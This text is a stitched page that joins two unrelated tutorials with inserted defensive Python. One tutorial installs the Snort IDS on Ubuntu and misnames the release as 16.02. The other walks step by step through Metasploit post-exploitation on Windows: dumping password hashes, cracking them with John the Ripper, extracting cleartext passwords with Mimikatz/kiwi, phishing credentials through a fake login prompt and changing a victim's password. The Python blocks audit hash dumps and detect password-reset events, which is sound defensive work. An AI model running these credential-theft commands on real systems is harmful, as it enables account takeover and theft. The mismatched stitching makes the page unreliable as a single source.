Configure Snort in Ubuntu (Easy Way)

In our previous article we discussed “Manually Snort Installation” on your system, but there is another method, using the apt repository, which reduces the manual effort and configures Snort on your system automatically.

Snort is software created by Martin Roesch that is widely used as an Intrusion Prevention System (IPS) and Intrusion Detection System (IDS) on networks. It is made up of five main components: the packet decoder, the preprocessors, the detection engine, the logging and alerting system, and the output modules.

The program is well known for real-time traffic analysis and packet logging on IP networks. By monitoring network traffic it detects probes and attacks, denial-of-service attacks, port scans and stealth port scans, buffer overflows, Server Message Block probes, and other malicious activity.

Snort can be configured in three main modes:

  • Sniffer mode: it will observe network packets and present them on the console.
  • Packet logger mode: it will record packets to the disk.
  • Intrusion detection mode: the program will monitor network traffic and analyze it against a rule set defined by the user.

Depending on what has been identified, the application then takes the specific action configured for it.

Let’s Begin!!

Snort Installation

We chose the ubuntu 16.02 operating system for installing and configuring Snort.

Check your network interface configuration by executing the ifconfig command; from here I came to know that 192.168.1.107 is my network IP.

Before installing Snort on your machine, you need to install the necessary Ubuntu dependencies. Therefore open a terminal and run the command below to refresh the package index before installing the prerequisites.

sudo apt-get update

This is the easiest way to install and configure Snort on your system, because everything it needs, whether the Snort rules directory or the logging directory, is provided by packages in the apt repository. Enter the command below to begin the Snort installation.

sudo apt-get install snort*

By default eth0 is set as the listening interface in the Snort configuration; since my network belongs to ens33, I chose it as the listening interface, as shown in the image below.

In the next configuration step it will ask you to enter a CIDR value for the address range of the local network. From the given image you can observe that I had entered CIDR 192.168.1.1/24 for a range of 256 addresses.

You can also enter multiple values, separated by commas without spaces.

Then open the configuration file with gedit to make some changes inside it.

sudo gedit /etc/snort/snort.conf

Scroll down the file to around line 45 and specify the network you are protecting, as shown in the image below.

# Setup the network addresses you are protecting

ipvar HOME_NET 192.168.1.1/24

Now run the command below to start Snort in IDS mode:

sudo snort -A console -i ens33 -c /etc/snort/snort.conf

Snort will now parse the complete configuration and validate the settings automatically, as shown in the image below:

Great!! We have successfully configured Snort as an IDS for protecting our network.
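The two settings that most often go wrong in this procedure are the HOME_NET value (the installer and snort.conf expect comma-separated CIDR entries with no spaces) and the listening interface passed with -i. The following added example, not code from the article or from the Snort project, checks a snort.conf fragment for those problems and builds the IDS command line; SAMPLE_CONF is a constructed fragment mirroring the line edited above.

```python
"""Check HOME_NET in snort.conf before starting Snort in IDS mode.

Added example, not part of the original article: validates the comma-separated
CIDR list (no spaces), counts addresses per entry and normalises host-bit
values such as 192.168.1.1/24 to the 192.168.1.0/24 Snort actually uses.
"""
import ipaddress
import re
import shlex

# Constructed snort.conf fragment mirroring the line edited in the article.
SAMPLE_CONF = """\
# Setup the network addresses you are protecting
ipvar HOME_NET 192.168.1.1/24
ipvar EXTERNAL_NET any
"""

HOME_NET_RE = re.compile(r"^\s*ipvar\s+HOME_NET\s+(.+?)\s*$", re.MULTILINE)


def check_home_net(conf_text):
    """Return ([(network, address_count), ...], [problem, ...]) for HOME_NET."""
    networks, problems = [], []
    match = HOME_NET_RE.search(conf_text)
    if not match:
        return networks, ["no 'ipvar HOME_NET' line found"]
    value = match.group(1)
    if " " in value:
        problems.append("spaces inside the HOME_NET list; use commas only")
        value = value.replace(" ", "")
    for entry in value.strip("[]").split(","):  # Snort also accepts [a,b] lists
        if entry == "any":
            problems.append("HOME_NET is 'any', so $HOME_NET rules match everything")
            continue
        try:
            # strict=False accepts 192.168.1.1/24 and masks it to 192.168.1.0/24
            net = ipaddress.ip_network(entry, strict=False)
        except ValueError:
            problems.append(f"invalid CIDR entry: {entry!r}")
            continue
        if str(net) != entry:
            problems.append(f"{entry} has host bits set; Snort treats it as {net}")
        networks.append((str(net), net.num_addresses))
    return networks, problems


def ids_command(interface, conf_path="/etc/snort/snort.conf", test_only=False):
    """Build the IDS-mode command from the article; -T only validates the config."""
    args = ["snort", "-A", "console", "-i", interface, "-c", conf_path]
    return shlex.join(args + ["-T"] if test_only else args)
```

Running the command with test_only=True (Snort's -T switch) validates the configuration and exits without going live, which is a cheap check to make before the real start.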

[Note: If installing Snort from the apt repository fails, go with the manual configuration from here.]

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

Post Exploitation for Remote Windows Password

In this article you will learn how to extract Windows users' passwords and change an extracted password using the Metasploit framework.

Here you first need to exploit the target machine to obtain a meterpreter session, and then bypass UAC to gain admin privileges.

Requirement:

Attacker: Kali Linux

Target: Windows 7

Let’s Begin

Extracting User Account Password

1st method

Once you have a meterpreter session on the target system, follow the steps below:

Execute the command below, which dumps the password hashes of all Windows users, as shown in the image below.

meterpreter > hashdump

Now copy all the hash values into a text file as shown below and save it. I had saved it as hash.txt on the desktop. It contains the hash values of 4 users with SID values 500: Administrator; 501: Guest; 1001: Penetst; 1000: Raj, along with their password hashes.

Send your meterpreter session to the background:

meterpreter > background

Now open a new terminal and use John the Ripper to crack the hashes by executing the command below:

john --wordlist=/root/Desktop/pass.txt --format=NT /root/Desktop/hashes.txt

/root/Desktop/pass.txt is the path of your password dictionary

/root/Desktop/hashes.txt is the path of the file containing the password hashes

From the image below you can confirm that we successfully retrieved the password 123 for user raj by cracking its hash.
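The hashdump output above is in pwdump format (user:RID:LM hash:NT hash:::), and the same file that feeds John is what a defender reviews after an assessment. The following added example, not code from the article or from Metasploit, audits such a dump for blank passwords, LM hashes still being stored and one password shared across accounts, using only the well-known empty-hash constants; SAMPLE_DUMP is constructed and its non-empty hash values are placeholders.

```python
"""Audit hashdump (pwdump-format) output for credential hygiene problems.

Added example, not part of the original article. Each input line has the form
user:RID:LM_hash:NT_hash::: as printed by meterpreter's hashdump. The checks
flag blank passwords, LM hashes still being stored, and one NT hash shared by
several accounts, without cracking anything.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}

# Constructed sample dump: non-empty hash values are placeholders, not real hashes.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
raj:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
pentest:1001:0123456789abcdef0123456789abcdef:0123456789abcdef0123456789abcdef:::
"""


def parse_pwdump(text):
    """Return (user, rid, lm, nt) tuples, skipping lines that are not hash records."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        records.append((parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return records


def audit(text):
    """Return (account, finding) pairs; well-known RIDs are labelled in the account name."""
    findings = []
    users_by_nt = defaultdict(list)
    for user, rid, lm, nt in parse_pwdump(text):
        label = f"{user} ({WELL_KNOWN_RIDS[rid]})" if rid in WELL_KNOWN_RIDS else user
        if nt == EMPTY_NT:
            findings.append((label, "blank password"))
        if lm != EMPTY_LM:
            findings.append((label, "LM hash stored; enable NoLMHash policy"))
        users_by_nt[nt].append(label)
    for nt, labels in users_by_nt.items():
        if nt != EMPTY_NT and len(labels) > 1:  # identical NT hash means identical password
            for label in labels:
                others = ", ".join(x for x in labels if x != label)
                findings.append((label, f"same password as {others}"))
    return findings
```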

2nd Method

This module will dump the local user accounts from the SAM database using the registry.

msf > use post/windows/gather/hashdump

msf post(hashdump) > set session 2

msf post(hashdump) > exploit

From the image below you can observe that we again obtained hash values for the local user accounts; repeat the step above to crack them using John the Ripper.

If you look at the highlighted text, you will see that it has also captured the password hint for user RAJ: “first three digits”.

3rd Method

This will dump local accounts from the SAM Database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.

msf > use post/windows/gather/smart_hashdump

msf post(smart_hashdump) > set session 2

msf post(smart_hashdump) > exploit

From the image below you can observe that we again obtained hash values for the RAJ and Administrator accounts; repeat the step above to crack them using John the Ripper. It has also captured the same password hint for user Raj.

4th Method

This module harvests credentials found on the host and stores them in the database.

msf > use post/windows/gather/credentials/credential_collector

msf post(credential_collector) > set session 2

msf post(credential_collector) > exploit

This module works in the same way and dumps the hash values of the local user accounts, as shown in the image below; repeat the step above to crack them using John the Ripper.

5th Method

This module will collect clear text Single Sign On credentials from the Local Security Authority using the Mimikatz extension. Blank passwords will not be stored in the database.

msf > use post/windows/gather/credentials/sso

msf post(sso) > set session 2

msf post(sso) > exploit

This module dumps the clear-text password of the logged-in user, as shown in the image below: user raj with password 123.


6th Method

In the meterpreter session we can load the “kiwi” extension, which works like “mimikatz” on Windows; execute the command below:

meterpreter > load kiwi

Now run the following command, which extracts all saved credentials of the local user accounts, as shown in the image below; here too we successfully retrieved password 123 for user raj.

meterpreter > creds_all

7th Method

This module is able to perform a phishing attack on the target by popping up a login prompt. When the user fills credentials in the login prompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and popup a login prompt when a specific process is starting.

msf > use post/windows/gather/phish_windows_credentials

msf post(phish_windows_credentials) > set session 2

msf post(phish_windows_credentials) > exploit

As described above, it launches a fake login prompt that looks genuine to the victim on the logon screen and waits for the user to enter their credentials.

At the logon screen the user sees a fake pop-up asking for credentials; as they enter their username and password to log in to the system, the attacker in the background captures the entered credentials.

From the image below you can observe the captured credentials for user raj. It saved the username, domain and password in a table.

Change password of Remote system

1st Method

This module will attempt to change the password of the targeted account. The typical usage is to change a newly created account’s password on a remote host to avoid the error, ‘System error 1907 has occurred,’ which is caused when the account policy enforces a password change before the next login.

msf > use post/windows/manage/change_password

msf post(change_password) > set smbuser raj

msf post(change_password) > set old_password 123

msf post(change_password) > set new_password 987

msf post(change_password) > set session 1

msf post(change_password) > exploit

Since we now know the logged-in user raj’s password, we can easily change it with the commands above. From the image below you can observe that we changed the password from 123 to 987.

2nd Method

As we know, meterpreter itself offers a range of post-exploitation options; it lets the attacker open a command prompt on the victim's system without their permission by executing the shell command, as given below.

meterpreter > shell

net user

net user raj 123

Hence in the 1st method we changed the password from 123 to 987, and now in the 2nd method we changed it back from 987 to 123 using the simple net user command, as shown in the image below.
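Both password-change paths above leave distinct traces in the Windows Security log: a change made with the old password known (as the change_password module does) is logged as event 4723, while a reset from an elevated shell with net user is logged as event 4724, where the subject account differs from the target. The following added example, not code from the article or from Metasploit, flags every reset and any account whose password changes twice within a short window, as happens in the 1st and 2nd methods; SAMPLE_EVENTS is constructed in a simplified "id|time|subject|target" form rather than real EVTX.

```python
"""Flag the two password-change paths from the article in Windows Security events.

Added example, not part of the original article. Event 4723 is logged when an
account changes its own password with the old one known; 4724 is logged when
the password is reset by another principal, which needs admin rights. Records
are constructed in a simplified "id|time|subject|target" form.
"""
from datetime import datetime, timedelta

# Constructed sample: a self-change followed by two administrative resets.
SAMPLE_EVENTS = """\
4723|2024-01-01 10:00:00|raj|raj
4724|2024-01-01 10:05:00|SYSTEM|raj
4724|2024-01-01 10:07:00|raj|raj
"""


def parse_events(text):
    """Return (event_id, timestamp, subject_account, target_account) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event_id, when, subject, target = line.split("|")
        events.append((int(event_id), datetime.strptime(when, "%Y-%m-%d %H:%M:%S"), subject, target))
    return events


def detect(text, window=timedelta(minutes=15)):
    """Alert on every reset (4724) and on repeated changes of one account within `window`."""
    alerts = []
    last_change = {}
    for event_id, when, subject, target in parse_events(text):
        if event_id == 4724:
            alerts.append(f"{when:%H:%M:%S} {target}: password reset by {subject} (needs admin rights)")
        elif event_id != 4723:
            continue  # other event types are not password changes
        prev = last_change.get(target)
        if prev is not None and when - prev <= window:
            alerts.append(f"{when:%H:%M:%S} {target}: changed again {when - prev} after the last change")
        last_change[target] = when
    return alerts
```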

